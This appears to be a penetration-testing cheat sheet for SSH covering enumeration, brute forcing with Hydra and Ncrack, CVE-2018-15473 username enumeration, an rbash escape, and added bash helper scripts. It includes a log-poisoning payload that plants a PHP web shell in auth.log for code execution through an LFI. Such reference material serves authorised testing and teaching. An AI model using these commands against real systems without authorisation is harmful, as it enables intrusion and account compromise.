SSH 22
Checklist
Check for SSH version vulnerabilities (grab the banner first; the version string is in it)
User enumeration possibilities
Verify if host keys match other systems (a host key shared across machines usually means a cloned image or appliance)
Test if password login is enabled (the client prompts for a password)
nmap -sV --script=ssh-hostkey -p22 10.10.10.10
Bruteforce if necessary with Hydra, Patator, Crowbar or Ncrack (CeWL only builds a wordlist from the target's web content; it does not bruteforce)
Commands and Tools
Banner Grabbing:
nc -vn <target_ip> 22
nmap -sV --script=ssh-hostkey -p22 <target_ip>
Nmap SSH Scripts:
ls -lh /usr/share/nmap/scripts/ssh*
sudo nmap <target_ip> -p 22 -sV --script=ssh-hostkey
Key Scanning:
ssh-keyscan -t rsa -p 22 <target_ip>
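The checklist item "verify if host keys match other systems" is easiest to act on when keyscan output for several hosts is compared automatically. The script below is an added example, not part of the original page: it takes lines in ssh-keyscan's output format (host, key type, base64 key) and reports every key that appears on more than one host. The five sample lines are constructed, with placeholder key blobs rather than real key material, and the host addresses are assumed.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): find hosts that share an SSH host key.
# Input is in ssh-keyscan output format: "<host> <keytype> <base64-key>".
# A host key shared across systems usually means a cloned image or appliance
# and is worth reporting on its own.

# Constructed sample of what ssh-keyscan runs against three hosts might print.
# The key blobs are placeholders, not real keys.
SAMPLE_KEYSCAN='10.10.10.10 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHostKeyA
10.10.10.11 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHostKeyA
10.10.10.12 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHostKeyB
10.10.10.10 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQRsaKeyA
10.10.10.12 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQRsaKeyA'

# scan_hosts: live use. Collect host keys from every host given on the command
# line; ssh-keyscan writes comment lines starting with '#', which are dropped.
scan_hosts() {
  ssh-keyscan -T 5 -t rsa,ecdsa,ed25519 "$@" 2>/dev/null | grep -v '^#'
}

# shared_keys: read keyscan lines on stdin and print
# "<keytype> <key> host1,host2,..." for every key seen on more than one host.
# The same host reported twice for one key is counted once.
shared_keys() {
  awk '
    NF >= 3 && $1 !~ /^#/ {
      k = $2 " " $3
      if (!(k in hosts)) { hosts[k] = $1; n[k] = 1 }
      else if (index("," hosts[k] ",", "," $1 ",") == 0) { hosts[k] = hosts[k] "," $1; n[k]++ }
    }
    END { for (k in n) if (n[k] > 1) print k " " hosts[k] }
  ' | sort
}

# count_shared: number of distinct keys that are reused across hosts.
count_shared() {
  shared_keys | grep -c . || true
}

# Self-check on the constructed sample (prints two reused keys):
printf '%s\n' "$SAMPLE_KEYSCAN" | shared_keys
```

For live use, pipe `scan_hosts 10.10.10.10 10.10.10.11 10.10.10.12` into `shared_keys`; keys are compared by their raw blob, so no ssh-keygen fingerprinting step is needed.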
Brute Forcing
Hydra Brute Force (keep the thread count low: sshd's MaxStartups defaults to 10:30:100 and starts dropping new connections beyond that, and fail2ban is common):
sudo hydra -l <username> -P rockyou.txt -v <target_ip> ssh -s 22 -t 4
Good password lists:
/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
NCRACK:
ncrack -p 22 --user <username> -P ./passwords.txt <target_ip>
Private Keys
Using Found Private Keys:
chmod 600 <key_file>
ssh -i <key_file> <user>@<target_ip>
(ssh refuses a key file that is readable by other users, hence the chmod; it also reports whether the key is passphrase-protected, in which case ssh2john and John the Ripper can crack it)
Generate Private Keys:
ssh-keygen -t rsa
System Administration
Check SSH Status:
sudo service ssh status
Start/Stop/Restart SSH Server:
sudo service ssh start
sudo service ssh stop
sudo service ssh restart
Verify SSH Process and Ports:
netstat -tulpn | grep sshd
Metasploit Modules
Enumerate Users:
use auxiliary/scanner/ssh/ssh_enumusers
set rhosts <target_ip>
set rport 22
set user_file users.txt
set threads 1
set threshold 5
run
Exploitation
SSH Log Poisoning (requires a Local File Inclusion vulnerability in a web application on the same host; the outcome is RCE):
Log injection: sshd records the username of a failed login in /var/log/auth.log (Debian-based; /var/log/secure on RHEL-based systems) as "Invalid user <name> from <ip>", so a PHP tag supplied as the username is written into the log verbatim:
ssh '<?php system($_GET["cmd"]);?>'@<target_ip>
Including the poisoned log through the LFI then executes the tag, with the command passed in the query string:
http://<target_ip>/search.php?id=/var/log/auth.log&cmd=<your_command>
Caveat: the web server user must be able to read the log file; on Debian-based systems auth.log is typically root:adm mode 0640, so this step often fails even when the LFI works.
Escape Restricted Shell (Rbash):
ssh <user>@<target_ip> -t "bash --noprofile"
(-t allocates a tty and --noprofile skips the login scripts; this works when the restriction is applied in the profile files, or when rbash is the login shell and bash is reachable through PATH, since rbash only blocks command names containing a slash)
Vulnerable Versions
OpenSSH < 7.7 (CVE-2018-15473): a malformed SSH_MSG_USERAUTH_REQUEST makes the server close the connection for a valid username but return SSH_MSG_USERAUTH_FAILURE for an invalid one, so usernames can be enumerated without a password. Distributions backport fixes without changing the version string, so confirm with an actual probe; the Metasploit ssh_enumusers module above implements the same check.
Enumerate usernames:
python ssh-username-enum.py <target_ip> -w usernames.txt
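Tying the banner grab from the "Commands and Tools" section to the version threshold above: the script below is an added example, not part of the original page or any tool it names. It pulls the server identification string, extracts the OpenSSH major.minor release, and compares it numerically against 7.7 so that a release such as 7.10 is not misjudged by a string compare. The three banners at the bottom are constructed test inputs, not captured from real hosts; the `nc` invocation is for live use and is not exercised by the self-check.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): grab the SSH banner and decide
# whether the server's OpenSSH release is below 7.7, the fix threshold for
# CVE-2018-15473 (username enumeration).

# grab_banner: live use. The server sends its identification string as soon
# as the TCP connection opens, so the first line is the banner; -w 5 closes
# the connection after five seconds of inactivity.
grab_banner() {
  nc -w 5 "$1" "${2:-22}" </dev/null 2>/dev/null | head -n 1 | tr -d '\r'
}

# openssh_version: extract "major.minor" from a banner such as
# "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7". Prints nothing and fails for
# non-OpenSSH banners (Dropbear, libssh, ...), where this CVE does not apply.
openssh_version() {
  local v
  v=$(printf '%s' "$1" | sed -n 's/^SSH-[0-9.]*-OpenSSH_\([0-9]*\.[0-9]*\).*/\1/p')
  [ -n "$v" ] && printf '%s\n' "$v"
}

# version_lt: true if $1 < $2, comparing major then minor as integers
# (so 7.10 > 7.7, which a plain string compare would get wrong).
version_lt() {
  local a_major=${1%%.*} a_minor=${1#*.} b_major=${2%%.*} b_minor=${2#*.}
  [ "$a_major" -lt "$b_major" ] || { [ "$a_major" -eq "$b_major" ] && [ "$a_minor" -lt "$b_minor" ]; }
}

# enumusers_vulnerable: exit 0 if the banner indicates OpenSSH < 7.7.
# Caveat: distributions backport fixes without bumping the version, so treat
# a hit as "probably vulnerable, confirm with the enumeration script".
enumusers_vulnerable() {
  local v
  v=$(openssh_version "$1") || return 1
  version_lt "$v" 7.7
}

# Constructed banners for a self-check (not captured from real hosts):
BANNER_OLD='SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7'
BANNER_NEW='SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6'
BANNER_DROPBEAR='SSH-2.0-dropbear_2019.78'

for b in "$BANNER_OLD" "$BANNER_NEW" "$BANNER_DROPBEAR"; do
  if enumusers_vulnerable "$b"; then
    echo "likely vulnerable to CVE-2018-15473: $b"
  else
    echo "not flagged: $b"
  fi
done
```

Against a live target, `enumusers_vulnerable "$(grab_banner <target_ip>)"` gives the verdict; the banner can also be taken from the nmap -sV output already collected.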
Additional Notes
Forcing a Specific Authentication Method (the debug output shows whether the server accepts it, which answers the "is password login enabled" checklist item):
ssh -v <target_ip> -o PreferredAuthentications=password
Analyze Debug Output:
ssh -v <username>@<target_ip>
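The useful line in that debug output is "debug1: Authentications that can continue: ...", which lists exactly the methods the server offers. The script below is an added example, not part of the original page: it parses that line out of `ssh -v` output and decides whether password-style login is on. The two debug excerpts are constructed, not captured from a real host; the `probe_auth_methods` function is for live use and is not exercised by the self-check. The username nonexistentuser is an assumed placeholder.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): read the server's offered
# authentication methods from OpenSSH client debug output.

# probe_auth_methods: live use. PubkeyAuthentication=no stops the client from
# logging in with an agent key by accident, and BatchMode=yes disables the
# password prompt so the command returns instead of hanging. ssh writes debug
# output to stderr, so stderr is routed into the pipe and stdout dropped.
probe_auth_methods() {
  ssh -v -o BatchMode=yes -o PubkeyAuthentication=no -o StrictHostKeyChecking=no \
      -p "${2:-22}" "nonexistentuser@$1" 2>&1 >/dev/null | auth_methods
}

# auth_methods: read ssh -v output on stdin and print the server's offered
# methods, one per line, deduplicated (the line repeats after each failed
# attempt, possibly with a shorter list).
auth_methods() {
  sed -n 's/^debug1: Authentications that can continue: //p' | tr ',' '\n' | sort -u
}

# password_enabled: exit 0 if "password" or "keyboard-interactive" is offered.
# keyboard-interactive is usually PAM's front end for passwords, so it counts.
password_enabled() {
  auth_methods | grep -qx -e password -e keyboard-interactive
}

# Constructed excerpts of two ssh -v runs (not captured from a real host):
DEBUG_PASSWORD_OK='debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Trying private key: /home/user/.ssh/id_rsa
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: password'

DEBUG_KEY_ONLY='debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey
debug1: Next authentication method: publickey
debug1: No more authentication methods to try.
nonexistentuser@10.10.10.10: Permission denied (publickey).'

# Self-check on the constructed excerpts:
for sample in "$DEBUG_PASSWORD_OK" "$DEBUG_KEY_ONLY"; do
  if printf '%s\n' "$sample" | password_enabled; then
    echo "password login offered: $(printf '%s\n' "$sample" | auth_methods | tr '\n' ' ')"
  else
    echo "key-only: $(printf '%s\n' "$sample" | auth_methods | tr '\n' ' ')"
  fi
done
```

A server that offers only publickey is not worth bruteforcing with Hydra; one that offers keyboard-interactive but not password may still accept passwords through PAM, which is why both are checked.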